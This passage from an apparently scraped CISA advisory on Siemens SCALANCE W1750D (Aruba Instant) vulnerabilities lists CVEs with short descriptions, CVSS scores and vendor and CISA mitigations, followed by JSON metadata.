RESOURCE WITH IMPROPER SYNCRONIZATION ('RACE CONDITION') CWE-362](<https://cwe.mitre.org/data/definitions/362.html>)\n\nA race condition in the web UI may allow an attacker to read arbitrary files off the underlying file system, including sensitive system files.\n\n[CVE-2021-25158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25158>) has been assigned to this vulnerability. A CVSS v3 base score of 5.9 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n#### 4.2.16 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn arbitrary file write vulnerability exists in the affected Aruba Instant using the web interface, which may allow an attacker to overwrite sensitive system files.\n\n[CVE-2021-25159](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25159>) has been assigned to this vulnerability. A CVSS v3 base score of 4.4 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N>)).\n\n#### 4.2.17 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nAn arbitrary file write vulnerability exists in the Aruba Instant web UI, which may allow an attacker to write arbitrary contents to a single specific backup file and result in the corruption of the backup file.\n\n[CVE-2021-25160](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25160>) has been assigned to this vulnerability. A CVSS v3 base score of 4.9 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N>)).\n\n#### 4.2.18 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nAn attacker may execute a reflected cross-site scripting attack against a user of the web-based management interface, which may allow an attacker to execute arbitrary script code in a victim\u2019s browser in the context of the affected interface.\n\n[CVE-2021-25161](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25161>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 4.2.19 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN A COMMAND ('COMMAND INJECTION') CWE-77](<https://cwe.mitre.org/data/definitions/77.html>)\n\nAn unauthenticated command injection vulnerability exists within the Aruba Instant Web UI, which may allow execution of arbitrary commands on the underlying operating system.\n\n[CVE-2021-25162](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25162>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H>)).\n\n#### 4.2.20 [IMPROPER NEUTRALIZATION OF SCRIPT-RELATED HTML TAGS IN A WEB PAGE (BASIC XSS) CWE-80](<https://cwe.mitre.org/data/definitions/80.html>)\n\nA vulnerability in the captive portal of Aruba Instant could allow an unauthenticated remote attacker to conduct a reflected cross-site scripting (XSS) attack against another user of the portal. A successful exploit could allow an attacker to execute arbitrary script code in a victim\u2019s browser in the context of the affected interface. \n\n[CVE-2021-34617](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34617>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 4.2.21 [UNCONTROLLED RESOURCE CONSUMPTION CWE-400](<https://cwe.mitre.org/data/definitions/400.html>)\n\nAn unauthenticated denial-of-service vulnerability exists in affected Aruba Instant access points. Exploitation of this vulnerability is only possible via direct ethernet connection to the access point. This vulnerability can be exploited through the LLPD protocol and could result in the unavailability of the affected access point due to resource exhaustion. \n\n[CVE-2021-34618](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34618>) has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been calculated; the CVSS vector string is ([AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H>)).\n\n### 4.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Chemical, Energy, Food and Agriculture, Healthcare and Public Health, Transportation Systems, and Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Germany\n\n### 4.4 RESEARCHER\n\nSiemens reported these vulnerabilities to CISA.\n\n## 5\\. MITIGATIONS\n\n**\\--------- Begin Update B Part 2 of 2 ---------**\n\nSiemens recommends upgrading SCALANCE W1750D to [v8.7.1.3 or later](<https://support.industry.siemens.com/cs/de/en/view/109802805/>)\n\n**\\--------- End Update B Part 2 of 2 ---------**\n\nSiemens has identified the following specific workarounds and mitigations for users to apply to reduce the risk:\n\n * Block access to the Aruba Instant device IP address on Port 8211/UDP from all untrusted users.\n * Block access to the Aruba Instant Command Line Interface from all untrusted users.\n * Block access to the Aruba Instant Web Management Interface from all untrusted users.\n\nAs a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to [Siemens\u2019 operational guidelines for industrial security](<https://cert-portal.siemens.com/operational-guidelines-industrial-security.pdf>) and following the recommendations in the product manuals.\n\nFor additional information see Siemens Security Advisory [SSA-723417](<https://cert-portal.siemens.com/productcert/pdf/ssa-723417.pdf>)\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://us-cert.cisa.gov/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nCISA also recommends users take the following measures to protect themselves from social engineering attacks:\n\n * Do not click web links or open unsolicited attachments in email messages.\n * Refer to [Recognizing and Avoiding Email Scams](<https://us-cert.cisa.gov/sites/default/files/publications/emailscams_0905.pdf>) for more information on avoiding email scams.\n * Refer to [Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>) for more information on social engineering attacks.\n\nNo known public exploits specifically target these vulnerabilities.\n\n### Vendor\n\nSiemens\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-14T12:00:00", "type": "ics", "title": "Siemens SCALANCE W1750D (Update B)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5317", "CVE-2019-5319", "CVE-2020-24635", "CVE-2020-24636", "CVE-2021-25143", "CVE-2021-25144", "CVE-2021-25145", "CVE-2021-25146", "CVE-2021-25148", "CVE-2021-25149", "CVE-2021-25150", "CVE-2021-25155", "CVE-2021-25156", "CVE-2021-25157", "CVE-2021-25158", "CVE-2021-25159", "CVE-2021-25160", "CVE-2021-25161", "CVE-2021-25162", "CVE-2021-34617", "CVE-2021-34618"], "modified": "2021-10-14T12:00:00", "id": "ICSA-21-131-14", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-21-131-14", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2021-25155
